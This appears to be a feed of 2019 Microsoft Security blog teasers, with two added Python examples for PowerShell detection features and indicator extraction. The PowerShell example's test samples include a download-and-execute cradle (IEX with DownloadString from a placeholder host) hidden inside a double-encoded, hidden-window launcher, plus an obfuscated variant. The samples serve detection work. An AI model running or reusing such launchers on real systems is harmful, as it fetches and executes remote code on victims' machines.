In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks

Credit to Author: Eric Avena | Date: Tue, 08 Oct 2019 15:00:11 +0000

Two new machine learning protection features within the behavioral blocking and containment capabilities in Microsoft Defender ATP specialize in detecting threats by analyzing behavior, adding new layers of protection after an attack has started running.

The post In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks appeared first on Microsoft Security.

CISO series: Lessons learned from the Microsoft SOC—Part 3a: Choosing SOC tools

Credit to Author: Todd VanderArk | Date: Mon, 07 Oct 2019 21:20:56 +0000

In the next post of our series, we provide tips on choosing technology to help a security operations center (SOC) be more responsive, effective, and collaborative.

Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave

Credit to Author: Eric Avena | Date: Tue, 01 Oct 2019 17:30:05 +0000

Microsoft is positioned as a leader in The Forrester Wave™: Endpoint Security Suites, Q3 2019, receiving among the second highest scores in both the strategy and market presence categories.

Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware

Credit to Author: Eric Avena | Date: Thu, 26 Sep 2019 17:34:41 +0000

A new fileless malware campaign we dubbed Nodersok delivers two very unusual LOLBins to turn infected machines into zombie proxies.

Operational resilience begins with your commitment to and investment in cyber resilience

Credit to Author: Todd VanderArk | Date: Tue, 17 Sep 2019 16:00:37 +0000

Operational resilience cannot be achieved without a true commitment to and investment in cyber resilience.

Deep learning rises: New methods for detecting malicious PowerShell

Credit to Author: Eric Avena | Date: Tue, 03 Sep 2019 16:00:03 +0000

We adopted a deep learning technique that was initially developed for natural language processing and applied it to expand Microsoft Defender ATP's detection coverage for malicious PowerShell scripts, which continue to be a critical attack vector.
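
The teaser above does not show the pipeline itself. As an added example that is not Microsoft's code, the block below shows the pre-processing a character-level PowerShell classifier needs before any model sees a script: peel nested -EncodedCommand layers (base64 over UTF-16LE, the encoding powershell.exe actually expects), drop backtick and string-concatenation obfuscation, and emit character n-gram counts as the bag-of-characters features a model would embed. The helper names, the depth limit and the two sample command lines are assumptions constructed for illustration.

```python
"""Added example (not Microsoft's code): normalize PowerShell command lines
into the text a character-level classifier consumes."""
import base64
import binascii
import re
from collections import Counter

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, ...).
_ENC_PREFIXES = ["e", "ec"] + ["encodedcommand"[:i] for i in range(2, 15)]
ENC_FLAG = re.compile(
    r"(?i)(?<!\S)-(?:" + "|".join(sorted(_ENC_PREFIXES, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)"
)
# Backticks that escape nothing meaningful (I`E`X) exist only to break signatures.
BACKTICK = re.compile(r"`(?![0abefnrtv`$\"'])")
# 'Down'+'load' style fragment joins.
STR_JOIN = re.compile(r"'\s*\+\s*'")


def decode_encoded_commands(cmdline: str, max_depth: int = 5) -> str:
    """Replace each -EncodedCommand flag and payload with the decoded UTF-16LE text.

    Repeats so powershell-inside-powershell launchers are peeled layer by layer;
    max_depth (an assumed limit) bounds the work on adversarial input.
    """
    for _ in range(max_depth):
        pos, replaced = 0, False
        while True:
            m = ENC_FLAG.search(cmdline, pos)
            if not m:
                break
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                pos = m.end()  # not a real payload (truncated, wrong flag); keep scanning
                continue
            cmdline = cmdline[: m.start()] + " " + decoded + cmdline[m.end():]
            replaced = True
            break
        if not replaced:
            break
    return cmdline


def normalize(script: str) -> str:
    """Decoded, de-obfuscated, whitespace-collapsed, lower-cased script text."""
    s = decode_encoded_commands(script)
    s = BACKTICK.sub("", s)
    s = STR_JOIN.sub("", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def char_ngrams(text: str, n: int = 3) -> Counter:
    """Character n-gram counts: the features a character-level model would embed."""
    return Counter(text[i : i + n] for i in range(len(text) - n + 1))


def _enc(ps: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed samples (not from a real incident): a two-layer encoded launcher
# and a backtick/concatenation-obfuscated one-liner.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand " + _enc("powershell -enc " + _enc(INNER))
)
OBFUSCATED = "powershell -w 1 \"I`E`X ('Down'+'load'+'String')\""

if __name__ == "__main__":
    for raw in (SAMPLE_CMDLINE, OBFUSCATED):
        text = normalize(raw)
        print(text)
        print(char_ngrams(text).most_common(5))
```

The point of decoding before featurizing is that a model trained on raw command lines only ever sees base64 noise for encoded launchers; after normalization both samples expose the same `downloadstring` substring, which is what a character-level model can actually learn from.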

Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant

Credit to Author: Eric Avena | Date: Fri, 23 Aug 2019 16:00:40 +0000

Gartner named Microsoft a Leader in the 2019 Gartner Magic Quadrant for Endpoint Protection Platforms, positioned highest in ability to execute.

From unstructured data to actionable intelligence: Using machine learning for threat intelligence

Credit to Author: Eric Avena | Date: Thu, 08 Aug 2019 16:30:12 +0000

Machine learning and natural language processing can automate the processing of unstructured text for insightful, actionable threat intelligence.
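
As an added example that is not from the Microsoft post, the block below is the rule-based baseline for the first step any such pipeline needs: refang the defanged indicators analysts write into reports (hxxp, [.]), pull out candidate indicators, validate IPv4 candidates so version strings are not mistaken for addresses, and filter file names out of the domain matches. The ML/NLP component the post describes is swapped out for regular expressions here; the report excerpt, the pattern names and the extension list are constructed for illustration.

```python
"""Added example (not Microsoft's code): rule-based indicator extraction from
unstructured report text, the pre-processing step before any ML ranking."""
import ipaddress
import re

# Constructed excerpt of an unstructured incident write-up (sample text only).
REPORT = """
The loader was fetched from hxxp://cdn-updates[.]example[.]com/pkg/loader.ps1
and beaconed to 203[.]0[.]113[.]45 over TCP/8443. The dropper svchost-update.exe
(SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855)
ran under agent version 3.1.401.9. Operators exploited CVE-2019-0708 to reach
the pivot host 10.0.0.5, and the lure arrived from billing@invoice-portal[.]example[.]net.
"""

PATTERNS = {
    "url": re.compile(r"\bhttps?://[^\s\"'<>)\]]+", re.I),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    "sha1": re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "md5": re.compile(r"\b[a-f0-9]{32}\b", re.I),
    "cve": re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.I),
    "email": re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
}
# Assumed list: "dropper.exe" matches the domain regex but is a file name, not a host.
FILE_EXTENSIONS = {"exe", "dll", "ps1", "vbs", "js", "bat", "cmd", "zip", "txt",
                   "docx", "xlsx", "pdf", "lnk", "hta", "scr"}


def refang(text: str) -> str:
    """Undo the defanging conventions analysts use to keep indicators unclickable."""
    text = re.sub(r"(?i)\bhxxp(s?)://", r"http\1://", text)
    text = re.sub(r"\s*[\[\(\{]\s*\.\s*[\]\)\}]\s*", ".", text)  # [.] (.) {.}
    text = re.sub(r"\[(:|@)\]", r"\1", text)                    # [:] [@]
    return text


def extract_iocs(text: str) -> dict:
    """Return {indicator type: sorted list of unique indicators} for the text."""
    text = refang(text)
    found = {name: {m.group(0) for m in rx.finditer(text)} for name, rx in PATTERNS.items()}

    # "3.1.401.9" satisfies the regex but is not an address: let ipaddress decide.
    valid_ips = set()
    for candidate in found["ipv4"]:
        try:
            valid_ips.add(str(ipaddress.IPv4Address(candidate)))
        except ValueError:
            pass
    found["ipv4"] = valid_ips

    found["domain"] = {d.lower() for d in found["domain"]
                       if d.rsplit(".", 1)[-1].lower() not in FILE_EXTENSIONS}
    found["url"] = {u.rstrip(".,;)") for u in found["url"]}  # drop sentence punctuation
    for hash_type in ("sha256", "sha1", "md5"):
        found[hash_type] = {h.lower() for h in found[hash_type]}
    return {name: sorted(values) for name, values in found.items()}


if __name__ == "__main__":
    for name, values in extract_iocs(REPORT).items():
        if values:
            print(f"{name}: {values}")
```

The two filters are where a naive extractor goes wrong in practice: a version string such as 3.1.401.9 is shaped like an address and a dropped file name is shaped like a host, and both would otherwise land in a blocklist. An ML ranker layered on top of this output would then decide which of the surviving indicators the text actually presents as malicious, which is the part a regex cannot do.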

A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response

Credit to Author: Eric Avena | Date: Wed, 07 Aug 2019 23:50:25 +0000

Through a cross-company, cross-continent collaboration, we discovered a vulnerability, secured customers, and developed a fix, all while learning important lessons that we can share with the industry.

How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection

Credit to Author: Eric Avena | Date: Wed, 31 Jul 2019 16:30:35 +0000

The deep integration of Windows Defender Antivirus with hardware-based isolation capabilities allows the detection of artifacts of attacks that tamper with kernel-mode agents at the hypervisor level.
